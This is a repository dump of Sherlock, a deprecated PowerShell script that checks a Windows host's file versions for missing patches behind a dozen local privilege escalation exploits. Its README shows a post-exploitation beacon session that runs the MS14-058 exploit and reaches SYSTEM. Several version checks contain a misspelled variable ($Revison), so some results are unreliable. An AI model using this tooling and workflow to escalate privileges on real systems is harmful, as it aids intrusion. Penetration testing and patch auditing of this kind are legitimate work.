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Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | > Deprecated. Have a look at [Watson](https://github.com/rasta-mouse/Watson) instead. 2 | 3 | # Sherlock 4 | 5 | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. 6 | 7 | ## Currently looks for: 8 | 9 | * MS10-015 : User Mode to Ring (KiTrap0D) 10 | * MS10-092 : Task Scheduler 11 | * MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow 12 | * MS13-081 : TrackPopupMenuEx Win32k NULL Page 13 | * MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference 14 | * MS15-051 : ClientCopyImage Win32k 15 | * MS15-078 : Font Driver Buffer Overflow 16 | * MS16-016 : 'mrxdav.sys' WebDAV 17 | * MS16-032 : Secondary Logon Handle 18 | * MS16-034 : Windows Kernel-Mode Drivers EoP 19 | * MS16-135 : Win32k Elevation of Privilege 20 | * CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc 21 | 22 | ## Basic Usage: 23 | 24 | ``` 25 | beacon> getuid 26 | [*] Tasked beacon to get userid 27 | [+] host called home, sent: 20 bytes 28 | [*] You are Win7-x64\Rasta 29 | 30 | beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1 31 | [*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1 32 | [+] host called home, sent: 2960 bytes 33 | 34 | beacon> powershell Find-MS14058 35 | [*] Tasked beacon to run: Find-MS14058 36 | [+] host called home, sent: 20 bytes 37 | [+] received output: 38 | 39 | Title : TrackPopupMenu Win32k Null Pointer Dereference 40 | MSBulletin : MS14-058 41 | CVEID : 2014-4113 42 | Link : https://www.exploit-db.com/exploits/35101/ 43 | VulnStatus : Appears Vulnerable 44 | 45 | beacon> elevate ms14-058 smb 46 | [*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337) 47 | [+] host called home, sent: 105015 bytes 48 | [+] received output: 49 | [*] Getting Windows version... 50 | [*] Solving symbols... 51 | [*] Requesting Kernel loaded modules... 52 | [*] pZwQuerySystemInformation required length 51216 53 | [*] Parsing SYSTEM_INFO... 54 | [*] 173 Kernel modules found 55 | [*] Checking module \SystemRoot\system32\ntoskrnl.exe 56 | [*] Good! nt found as ntoskrnl.exe at 0x0264f000 57 | [*] ntoskrnl.exe loaded in userspace at: 40000000 58 | [*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC 59 | [*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0 60 | [*] Registering class... 61 | [*] Creating window... 62 | [*] Allocating null page... 63 | [*] Getting PtiCurrent... 64 | [*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0 65 | [*] Creating a fake structure at NULL... 66 | [*] Triggering vulnerability... 67 | [!] Executing payload... 68 | 69 | [+] host called home, sent: 204885 bytes 70 | [+] established link to child beacon: 192.168.56.105 71 | 72 | beacon> getuid 73 | [*] Tasked beacon to get userid 74 | [+] host called home, sent: 8 bytes 75 | [*] You are NT AUTHORITY\SYSTEM (admin) 76 | ``` -------------------------------------------------------------------------------- /Sherlock.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | File: Sherlock.ps1 4 | Author: @_RastaMouse 5 | License: GNU General Public License v3.0 6 | 7 | #> 8 | 9 | <# 10 | 11 | RTM build reference, because I'm stupid and forget... 12 | 13 | 6002: Vista SP2/2008 SP2 14 | 7600: 7/2008 R2 15 | 7601: 7 SP1/2008 R2 SP1 16 | 9200: 8/2012 17 | 9600: 8.1/2012 R2 18 | 10240: 10 Threshold 19 | 10586: 10 Threshold 2 20 | 14393: 10 Redstone/2016 21 | 15063: 10 Redstone 2 22 | 16299: 10 Redstone 3 23 | 17134: 10 Redstone 4 24 | 25 | #> 26 | 27 | $Global:ExploitTable = $null 28 | 29 | function Get-FileVersionInfo ($FilePath) { 30 | 31 | $VersionInfo = (Get-Item $FilePath).VersionInfo 32 | $FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart ) 33 | 34 | return $FileVersion 35 | 36 | } 37 | 38 | function Get-InstalledSoftware($SoftwareName) { 39 | 40 | $SoftwareVersion = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $SoftwareName } | Select-Object Version 41 | $SoftwareVersion = $SoftwareVersion.Version # I have no idea what I'm doing 42 | 43 | return $SoftwareVersion 44 | 45 | } 46 | 47 | function Get-Architecture { 48 | 49 | # This is the CPU architecture. Returns "64-bit" or "32-bit". 50 | $CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture 51 | 52 | # This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86". 53 | $ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE 54 | 55 | return $CPUArchitecture, $ProcessArchitecture 56 | 57 | } 58 | 59 | function Get-CPUCoreCount { 60 | 61 | $CoreCount = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors 62 | 63 | return $CoreCount 64 | 65 | } 66 | 67 | function New-ExploitTable { 68 | 69 | # Create the table 70 | $Global:ExploitTable = New-Object System.Data.DataTable 71 | 72 | # Create the columns 73 | $Global:ExploitTable.Columns.Add("Title") 74 | $Global:ExploitTable.Columns.Add("MSBulletin") 75 | $Global:ExploitTable.Columns.Add("CVEID") 76 | $Global:ExploitTable.Columns.Add("Link") 77 | $Global:ExploitTable.Columns.Add("VulnStatus") 78 | 79 | # Add the exploits we are interested in. 80 | 81 | # MS10 82 | $Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/") 83 | $Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/") 84 | # MS13 85 | $Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/") 86 | $Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/") 87 | # MS14 88 | $Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/") 89 | # MS15 90 | $Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/") 91 | $Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/") 92 | # MS16 93 | $Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/") 94 | $Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/") 95 | $Global:ExploitTable.Rows.Add("Windows Kernel-Mode Drivers EoP","MS16-034","2016-0093/94/95/96","https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?") 96 | $Global:ExploitTable.Rows.Add("Win32k Elevation of Privilege","MS16-135","2016-7255","https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135") 97 | # Miscs that aren't MS 98 | $Global:ExploitTable.Rows.Add("Nessus Agent 6.6.2 - 6.10.3","N/A","2017-7199","https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html") 99 | 100 | } 101 | 102 | function Set-ExploitTable ($MSBulletin, $VulnStatus) { 103 | 104 | if ( $MSBulletin -like "MS*" ) { 105 | 106 | $Global:ExploitTable | Where-Object { $_.MSBulletin -eq $MSBulletin 107 | 108 | } | ForEach-Object { 109 | 110 | $_.VulnStatus = $VulnStatus 111 | 112 | } 113 | 114 | } else { 115 | 116 | 117 | $Global:ExploitTable | Where-Object { $_.CVEID -eq $MSBulletin 118 | 119 | } | ForEach-Object { 120 | 121 | $_.VulnStatus = $VulnStatus 122 | 123 | } 124 | 125 | } 126 | 127 | } 128 | 129 | function Get-Results { 130 | 131 | $Global:ExploitTable 132 | 133 | } 134 | 135 | function Find-AllVulns { 136 | 137 | if ( !$Global:ExploitTable ) { 138 | 139 | $null = New-ExploitTable 140 | 141 | } 142 | 143 | Find-MS10015 144 | Find-MS10092 145 | Find-MS13053 146 | Find-MS13081 147 | Find-MS14058 148 | Find-MS15051 149 | Find-MS15078 150 | Find-MS16016 151 | Find-MS16032 152 | Find-MS16034 153 | Find-MS16135 154 | Find-CVE20177199 155 | 156 | Get-Results 157 | 158 | } 159 | 160 | function Find-MS10015 { 161 | 162 | $MSBulletin = "MS10-015" 163 | $Architecture = Get-Architecture 164 | 165 | if ( $Architecture[0] -eq "64-bit" ) { 166 | 167 | $VulnStatus = "Not supported on 64-bit systems" 168 | 169 | } Else { 170 | 171 | $Path = $env:windir + "\system32\ntoskrnl.exe" 172 | $VersionInfo = Get-FileVersionInfo($Path) 173 | $VersionInfo = $VersionInfo.Split(".") 174 | 175 | $Build = $VersionInfo[2] 176 | $Revision = $VersionInfo[3].Split(" ")[0] 177 | 178 | switch ( $Build ) { 179 | 180 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20591" ] } 181 | default { $VulnStatus = "Not Vulnerable" } 182 | 183 | } 184 | 185 | } 186 | 187 | Set-ExploitTable $MSBulletin $VulnStatus 188 | 189 | } 190 | 191 | function Find-MS10092 { 192 | 193 | $MSBulletin = "MS10-092" 194 | $Architecture = Get-Architecture 195 | 196 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 197 | 198 | $Path = $env:windir + "\system32\schedsvc.dll" 199 | 200 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 201 | 202 | $Path = $env:windir + "\sysnative\schedsvc.dll" 203 | 204 | } 205 | 206 | $VersionInfo = Get-FileVersionInfo($Path) 207 | $VersionInfo = $VersionInfo.Split(".") 208 | 209 | $Build = $VersionInfo[2] 210 | $Revision = $VersionInfo[3].Split(" ")[0] 211 | 212 | switch ( $Build ) { 213 | 214 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20830" ] } 215 | default { $VulnStatus = "Not Vulnerable" } 216 | 217 | } 218 | 219 | Set-ExploitTable $MSBulletin $VulnStatus 220 | 221 | } 222 | 223 | function Find-MS13053 { 224 | 225 | $MSBulletin = "MS13-053" 226 | $Architecture = Get-Architecture 227 | 228 | if ( $Architecture[0] -eq "64-bit" ) { 229 | 230 | $VulnStatus = "Not supported on 64-bit systems" 231 | 232 | } Else { 233 | 234 | $Path = $env:windir + "\system32\win32k.sys" 235 | $VersionInfo = Get-FileVersionInfo($Path) 236 | $VersionInfo = $VersionInfo.Split(".") 237 | 238 | $Build = $VersionInfo[2] 239 | $Revision = $VersionInfo[3].Split(" ")[0] 240 | 241 | switch ( $Build ) { 242 | 243 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "17000" ] } 244 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22348" ] } 245 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20732" ] } 246 | default { $VulnStatus = "Not Vulnerable" } 247 | 248 | } 249 | 250 | } 251 | 252 | Set-ExploitTable $MSBulletin $VulnStatus 253 | 254 | } 255 | 256 | function Find-MS13081 { 257 | 258 | $MSBulletin = "MS13-081" 259 | $Architecture = Get-Architecture 260 | 261 | if ( $Architecture[0] -eq "64-bit" ) { 262 | 263 | $VulnStatus = "Not supported on 64-bit systems" 264 | 265 | } Else { 266 | 267 | $Path = $env:windir + "\system32\win32k.sys" 268 | $VersionInfo = Get-FileVersionInfo($Path) 269 | $VersionInfo = $VersionInfo.Split(".") 270 | 271 | $Build = $VersionInfo[2] 272 | $Revision = $VersionInfo[3].Split(" ")[0] 273 | 274 | switch ( $Build ) { 275 | 276 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] } 277 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22435" ] } 278 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20807" ] } 279 | default { $VulnStatus = "Not Vulnerable" } 280 | 281 | } 282 | 283 | } 284 | 285 | Set-ExploitTable $MSBulletin $VulnStatus 286 | 287 | } 288 | 289 | function Find-MS14058 { 290 | 291 | $MSBulletin = "MS14-058" 292 | $Architecture = Get-Architecture 293 | 294 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 295 | 296 | $Path = $env:windir + "\system32\win32k.sys" 297 | 298 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 299 | 300 | $Path = $env:windir + "\sysnative\win32k.sys" 301 | 302 | } 303 | 304 | $VersionInfo = Get-FileVersionInfo($Path) 305 | $VersionInfo = $VersionInfo.Split(".") 306 | 307 | $Build = $VersionInfo[2] 308 | $Revision = $VersionInfo[3].Split(" ")[0] 309 | 310 | switch ( $Build ) { 311 | 312 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] } 313 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] } 314 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] } 315 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] } 316 | default { $VulnStatus = "Not Vulnerable" } 317 | 318 | } 319 | 320 | Set-ExploitTable $MSBulletin $VulnStatus 321 | 322 | } 323 | 324 | function Find-MS15051 { 325 | 326 | $MSBulletin = "MS15-051" 327 | $Architecture = Get-Architecture 328 | 329 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 330 | 331 | $Path = $env:windir + "\system32\win32k.sys" 332 | 333 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 334 | 335 | $Path = $env:windir + "\sysnative\win32k.sys" 336 | 337 | } 338 | 339 | $VersionInfo = Get-FileVersionInfo($Path) 340 | $VersionInfo = $VersionInfo.Split(".") 341 | 342 | $Build = $VersionInfo[2] 343 | $Revision = $VersionInfo[3].Split(" ")[0] 344 | 345 | switch ( $Build ) { 346 | 347 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18000" ] } 348 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] } 349 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] } 350 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] } 351 | default { $VulnStatus = "Not Vulnerable" } 352 | 353 | } 354 | 355 | Set-ExploitTable $MSBulletin $VulnStatus 356 | 357 | } 358 | 359 | function Find-MS15078 { 360 | 361 | $MSBulletin = "MS15-078" 362 | 363 | $Path = $env:windir + "\system32\atmfd.dll" 364 | $VersionInfo = Get-FileVersionInfo($Path) 365 | $VersionInfo = $VersionInfo.Split(" ") 366 | 367 | $Revision = $VersionInfo[2] 368 | 369 | switch ( $Revision ) { 370 | 371 | 243 { $VulnStatus = "Appears Vulnerable" } 372 | default { $VulnStatus = "Not Vulnerable" } 373 | 374 | } 375 | 376 | Set-ExploitTable $MSBulletin $VulnStatus 377 | 378 | } 379 | 380 | function Find-MS16016 { 381 | 382 | $MSBulletin = "MS16-016" 383 | $Architecture = Get-Architecture 384 | 385 | if ( $Architecture[0] -eq "64-bit" ) { 386 | 387 | $VulnStatus = "Not supported on 64-bit systems" 388 | 389 | } Else { 390 | 391 | $Path = $env:windir + "\system32\drivers\mrxdav.sys" 392 | $VersionInfo = Get-FileVersionInfo($Path) 393 | $VersionInfo = $VersionInfo.Split(".") 394 | 395 | $Build = $VersionInfo[2] 396 | $Revision = $VersionInfo[3].Split(" ")[0] 397 | 398 | switch ( $Build ) { 399 | 400 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16000" ] } 401 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "23317" ] } 402 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21738" ] } 403 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18189" ] } 404 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16683" ] } 405 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "103" ] } 406 | default { $VulnStatus = "Not Vulnerable" } 407 | 408 | } 409 | 410 | } 411 | 412 | Set-ExploitTable $MSBulletin $VulnStatus 413 | 414 | } 415 | 416 | function Find-MS16032 { 417 | 418 | $MSBulletin = "MS16-032" 419 | 420 | $CPUCount = Get-CPUCoreCount 421 | 422 | if ( $CPUCount -eq "1" ) { 423 | 424 | $VulnStatus = "Not Supported on single-core systems" 425 | 426 | } Else { 427 | 428 | $Architecture = Get-Architecture 429 | 430 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 431 | 432 | $Path = $env:windir + "\system32\seclogon.dll" 433 | 434 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 435 | 436 | $Path = $env:windir + "\sysnative\seclogon.dll" 437 | 438 | } 439 | 440 | $VersionInfo = Get-FileVersionInfo($Path) 441 | 442 | $VersionInfo = $VersionInfo.Split(".") 443 | 444 | $Build = [int]$VersionInfo[2] 445 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 446 | 447 | switch ( $Build ) { 448 | 449 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19598 -Or ( $Revision -ge 23000 -And $Revision -le 23909 ) ] } 450 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19148 ] } 451 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19148 -Or ( $Revision -ge 23000 -And $Revision -le 23347 ) ] } 452 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17649 -Or ( $Revision -ge 21000 -And $Revision -le 21767 ) ] } 453 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18230 ] } 454 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 16724 ] } 455 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 161 ] } 456 | default { $VulnStatus = "Not Vulnerable" } 457 | 458 | } 459 | } 460 | 461 | Set-ExploitTable $MSBulletin $VulnStatus 462 | 463 | } 464 | 465 | function Find-MS16034 { 466 | 467 | $MSBulletin = "MS16-034" 468 | 469 | $Architecture = Get-Architecture 470 | 471 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 472 | 473 | $Path = $env:windir + "\system32\win32k.sys" 474 | 475 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 476 | 477 | $Path = $env:windir + "\sysnative\win32k.sys" 478 | 479 | } 480 | 481 | $VersionInfo = Get-FileVersionInfo($Path) 482 | 483 | $VersionInfo = $VersionInfo.Split(".") 484 | 485 | $Build = [int]$VersionInfo[2] 486 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 487 | 488 | switch ( $Build ) { 489 | 490 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19597 -Or $Revision -lt 23908 ] } 491 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19145 -Or $Revision -lt 23346 ] } 492 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17647 -Or $Revision -lt 21766 ] } 493 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18228 ] } 494 | default { $VulnStatus = "Not Vulnerable" } 495 | 496 | } 497 | 498 | Set-ExploitTable $MSBulletin $VulnStatus 499 | 500 | } 501 | 502 | function Find-CVE20177199 { 503 | 504 | $CVEID = "2017-7199" 505 | $SoftwareVersion = Get-InstalledSoftware "Nessus Agent" 506 | 507 | if ( !$SoftwareVersion ) { 508 | 509 | $VulnStatus = "Not Vulnerable" 510 | 511 | } else { 512 | 513 | $SoftwareVersion = $SoftwareVersion.Split(".") 514 | 515 | $Major = [int]$SoftwareVersion[0] 516 | $Minor = [int]$SoftwareVersion[1] 517 | $Build = [int]$SoftwareVersion[2] 518 | 519 | switch( $Major ) { 520 | 521 | 6 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Minor -eq 10 -and $Build -le 3 -Or ( $Minor -eq 6 -and $Build -le 2 ) -Or ( $Minor -le 9 -and $Minor -ge 7 ) ] } # 6.6.2 - 6.10.3 522 | default { $VulnStatus = "Not Vulnerable" } 523 | 524 | } 525 | 526 | } 527 | 528 | Set-ExploitTable $CVEID $VulnStatus 529 | 530 | } 531 | 532 | function Find-MS16135 { 533 | 534 | $MSBulletin = "MS16-135" 535 | $Architecture = Get-Architecture 536 | 537 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 538 | 539 | $Path = $env:windir + "\system32\win32k.sys" 540 | 541 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 542 | 543 | $Path = $env:windir + "\sysnative\win32k.sys" 544 | 545 | } 546 | 547 | $VersionInfo = Get-FileVersionInfo($Path) 548 | $VersionInfo = $VersionInfo.Split(".") 549 | 550 | $Build = [int]$VersionInfo[2] 551 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 552 | 553 | switch ( $Build ) { 554 | 555 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 23584 ] } 556 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 18524 ] } 557 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16384 ] } 558 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] } 559 | 14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] } 560 | default { $VulnStatus = "Not Vulnerable" } 561 | 562 | } 563 | 564 | Set-ExploitTable $MSBulletin $VulnStatus 565 | 566 | } --------------------------------------------------------------------------------